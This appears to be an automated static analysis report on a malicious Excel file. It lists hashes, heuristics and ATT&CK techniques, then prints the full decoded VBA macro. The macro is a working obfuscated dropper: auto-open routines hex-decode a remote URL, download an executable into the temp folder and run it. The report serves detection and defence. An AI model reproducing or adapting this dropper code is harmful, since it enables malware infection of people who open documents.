Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0d8ebd5567fc7c9f…

MALICIOUS

Office (OLE)

35.0 KB Created: 1996-10-08 23:32:33 Authoring application: Microsoft Excel First seen: 2015-02-05
MD5: 551bf7d91d5a6ab6b887956d5ce08571 SHA-1: 98d6d6b68e37a3be38e289ad021edfbb417f8c9b SHA-256: 0d8ebd5567fc7c9fdb87dc36673bb5b4e4f193efacfdd6bfddc36dc5b2422325
326 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer

The sample is an Excel file containing obfuscated VBA macros, including an AutoOpen subroutine. Critical heuristics indicate the use of URLDownloadToFile API and potential Shell calls, suggesting the macro's purpose is to download and execute a second-stage payload from a remote location. The obfuscation and use of a standard API for downloading files are common tactics for malware droppers.

Heuristics 10

  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        pHUdsfd = Shell(oGYUIgiu, 1)
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        pHUdsfd = Shell(oGYUIgiu, 1)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        oGYUIgiu = Environ(BUHVugrue("54454D50")) & BUHVugrue("5C5547766466672E657865")
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7773 bytes
SHA-256: 36f4cb6422157c5370bf5de2a7b8be193f79494d0d4339f91491793702eeb406
Detection
ClamAV: No threats found
Obfuscation or payload: likely
65 of 113 identifiers look randomly generated (e.g. 'UJeTKZjRRErSpBP') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal dsfdsfdsf As LongPtr, _
    ByVal rtyeffg As String, _
    ByVal fdger As String, _
    ByVal reteruywer As Long, _
    ByVal werwedsf As LongPtr) As LongPtr
#Else
    Private Declare Function URLDownloadToFile Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal dsfdsfdsf As Long, _
    ByVal rtyeffg As String, _
    ByVal fdger As String, _
    ByVal reteruywer As Long, _
    ByVal werwedsf As Long) As Long
#End If


Sub werwehytef()
Dim QOBXhmAl As Integer
For QOBXhmAl = 0 To 3
Dim kXJALATO As Integer
For kXJALATO = 0 To 5
Dim DwptkYLg As Integer
For DwptkYLg = 0 To 9
DoEvents
Next DwptkYLg
DoEvents
Next kXJALATO
Dim tlwoFgep As Integer
For tlwoFgep = 0 To 3
DoEvents
Next tlwoFgep
DoEvents
Next QOBXhmAl
Dim vtRZaliF As Integer
For vtRZaliF = 0 To 6
Dim pHKvosSI As Integer
For pHKvosSI = 0 To 4
DoEvents
Next pHKvosSI
DoEvents
Next vtRZaliF
Dim flWdzivJ As Integer
For flWdzivJ = 0 To 7
DoEvents
Next flWdzivJ
sdfsdwee
End Sub
Sub AutoOpen()
Dim VpUsliln As Integer
For VpUsliln = 0 To 2
Dim SAYlUiXp As Integer
For SAYlUiXp = 0 To 6
Dim XlKwlndr As Integer
For XlKwlndr = 0 To 5
DoEvents
Next XlKwlndr
DoEvents
Next SAYlUiXp
Dim NWWpsxNd As Integer
For NWWpsxNd = 0 To 8
DoEvents
Next NWWpsxNd
DoEvents
Next VpUsliln
Dim HrOinrOl As Integer
For HrOinrOl = 0 To 6
Dim MRKwlEzM As Integer
For MRKwlEzM = 0 To 7
DoEvents
Next MRKwlEzM
DoEvents
Next HrOinrOl
Dim VuWpsbFr As Integer
For VuWpsbFr = 0 To 8
DoEvents
Next VuWpsbFr
    werwehytef
End Sub
Sub Workbook_Open()
Dim fkNGSJaZ As Integer
For fkNGSJaZ = 0 To 1
Dim vofHhwnj As Integer
For vofHhwnj = 0 To 6
Dim WZzOiENz As Integer
For WZzOiENz = 0 To 1
DoEvents
Next WZzOiENz
DoEvents
Next vofHhwnj
Dim UedLuKbT As Integer
For UedLuKbT = 0 To 8
DoEvents
Next UedLuKbT
DoEvents
Next fkNGSJaZ
Dim vrUjKxcT As Integer
For vrUjKxcT = 0 To 6
Dim fkaGOdrn As Integer
For fkaGOdrn = 0 To 5
DoEvents
Next fkaGOdrn
DoEvents
Next vrUjKxcT
Dim itRnfloL As Integer
For itRnfloL = 0 To 3
DoEvents
Next itRnfloL
    werwehytef
End Sub
Sub sdfsdwee()
Dim nKOyHRKO As Integer
For nKOyHRKO = 0 To 7
Dim fjaGYIub As Integer
For fjaGYIub = 0 To 1
Dim DcXpaUZB As Integer
For DcXpaUZB = 0 To 3
DoEvents
Next DcXpaUZB
DoEvents
Next fjaGYIub
Dim nVumNXzZ As Integer
For nVumNXzZ = 0 To 1
DoEvents
Next nVumNXzZ
DoEvents
Next nKOyHRKO
Dim kLrEvRLI As Integer
For kLrEvRLI = 0 To 2
Dim KJSNNToS As Integer
For KJSNNToS = 0 To 7
DoEvents
Next KJSNNToS
DoEvents
Next kLrEvRLI
Dim SRhPEQft As Integer
For SRhPEQft = 0 To 5
DoEvents
Next SRhPEQft
Next SRhPEQft
HBBJK = BUHVugrue("6874")
hkhnioki = BUHVugrue("74703A2F2F")
hojdsfg = BUHVugrue("39352E3136332E3132312E37313A383038302F6D6F7073692F706F7073692E706870")
    uyVUHjdg = HBBJK + hkhnioki + hojdsfg
Dim lGxtiFPa As Integer
For lGxtiFPa = 0 To 2
Dim eEwdmMHl As Integer
For eEwdmMHl = 0 To 5
Dim QYosYDRG As Integer
For QYosYDRG = 0 To 2
DoEvents
Next QYosYDRG
DoEvents
Next eEwdmMHl
Dim vulxTzrl As Integer
For vulxTzrl = 0 To 9
DoEvents
Next vulxTzrl
DoEvents
Next lGxtiFPa
Dim uyvadHZZ As Integer
For uyvadHZZ = 0 To 6
Dim MYIgMYac As Integer
For MYIgMYac = 0 To 1
DoEvents
Next MYIgMYac
DoEvents
Next uyvadHZZ
Dim lSPogoeg As Integer
For lSPogoeg = 0 To 6
DoEvents
Next lSPogoeg
    oGYUIgiu = Environ(BUHVugrue("54454D50")) & BUHVugrue("5C5547766466672E657865")
Dim AFzUlTGV As Integer
For AFzUlTGV = 0 To 9
Dim ysVaDJCV As Integer
For ysVaDJCV = 0 To 7
Dim lFAFtXdl As Integer
For lFAFtXdl = 0 To 2
DoEvents
Next lFAFtXdl
DoEvents
Next ysVaDJCV
Dim UtrTsIYm As Integer
For UtrTsIYm = 0 To 5
DoEvents
Next UtrTsIYm
DoEvents
Next AFzUlTGV
Dim NBASjVzj As Integer
For NBASjVzj = 0 To 8
Dim eRlvndEb As Integer
For eRlvndEb = 0 To 6
DoEvents
Next eRlvndEb
DoEvents
Next NBASjVzj
Dim kWWhUBVb As Integer
For kWWhUBVb = 0 To 9
DoEvents
Next kWWhUBVb
    eUUsdgf = URLDownloadToFile(0&, uyVUHjdg, oGYUIgiu, 0&, 0&)
   Dim pHUdsfd
Dim mAYkCQMj As Integer
For mAYkCQMj = 0 To 8
Dim TfgSUebU As Integer
For TfgSUebU = 0 To 4
Dim lIaKjaFk As Integer
For lIaKjaFk = 0 To 2
DoEvents
Next lIaKjaFk
DoEvents
Next TfgSUebU
Dim IBADqvaD As Integer
For IBADqvaD = 0 To 5
DoEvents
Next IBADqvaD
DoEvents
Next mAYkCQMj
Dim lFbXYkVq As Integer
For lFbXYkVq = 0 To 2
Dim bzGSzOfn As Integer
For bzGSzOfn = 0 To 3
DoEvents
Next bzGSzOfn
DoEvents
Next lFbXYkVq
Dim zFnLDitd As Integer
For zFnLDitd = 0 To 6
DoEvents
Next zFnLDitd
    pHUdsfd = Shell(oGYUIgiu, 1)

End Sub


Public Function BUHVugrue(ByVal UJeTKZjRRErSpBP As String) As String
For GAqVffe = 1 To Len(UJeTKZjRRErSpBP) Step 2
Dim GCYINvKW As Integer
For GCYINvKW = 0 To 9
Dim GBcmygBP As Integer
For GBcmygBP = 0 To 4
Dim VBWAuLfD As Integer
For VBWAuLfD = 0 To 7
DoEvents
Next VBWAuLfD
DoEvents
Next GBcmygBP
Dim hXiYEAvI As Integer
For hXiYEAvI = 0 To 2
DoEvents
Next hXiYEAvI
DoEvents
Next GCYINvKW
Dim XupwfuAF As Integer
For XupwfuAF = 0 To 5
Dim nUCwEhDX As Integer
For nUCwEhDX = 0 To 3
DoEvents
Next nUCwEhDX
DoEvents
Next XupwfuAF
Dim RpNpxsby As Integer
For RpNpxsby = 0 To 4
DoEvents
Next RpNpxsby
OAEeSPJcZw = Chr(CDbl(Chr(38) & Chr(72) & Mid$(UJeTKZjRRErSpBP, GAqVffe, 2)))
Dim DuDiCbga As Integer
For DuDiCbga = 0 To 6
Dim KYaocdyh As Integer
For KYaocdyh = 0 To 1
Dim WdSgkWrx As Integer
For WdSgkWrx = 0 To 1
DoEvents
Next WdSgkWrx
DoEvents
Next KYaocdyh
Dim OSNdzeBF As Integer
For OSNdzeBF = 0 To 8
DoEvents
Next OSNdzeBF
DoEvents
Next DuDiCbga
Dim pRddMWhq As Integer
For pRddMWhq = 0 To 2
Dim MxHzzJfz As Integer
For MxHzzJfz = 0 To 1
DoEvents
Next MxHzzJfz
DoEvents
Next pRddMWhq
Dim UVNdayDT As Integer
For UVNdayDT = 0 To 1
DoEvents
Next UVNdayDT
qwsEHVrtCMHkAS = qwsEHVrtCMHkAS & OAEeSPJcZw
Next GAqVffe
Dim JOHXGwzq As Integer
For JOHXGwzq = 0 To 6
Dim iMLSjCiD As Integer
For iMLSjCiD = 0 To 6
Dim ToNdaoAx As Integer
For ToNdaoAx = 0 To 8
DoEvents
Next ToNdaoAx
DoEvents
Next iMLSjCiD
Dim vCRVRgYG As Integer
For vCRVRgYG = 0 To 6
DoEvents
Next vCRVRgYG
DoEvents
Next JOHXGwzq
Dim iGddLVrz As Integer
For iGddLVrz = 0 To 6
Dim tqkMiOqQ As Integer
For tqkMiOqQ = 0 To 3
DoEvents
Next tqkMiOqQ
DoEvents
Next iGddLVrz
Dim JQZruVPf As Integer
For JQZruVPf = 0 To 1
DoEvents
Next JQZruVPf
BUHVugrue = qwsEHVrtCMHkAS
End Function








Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.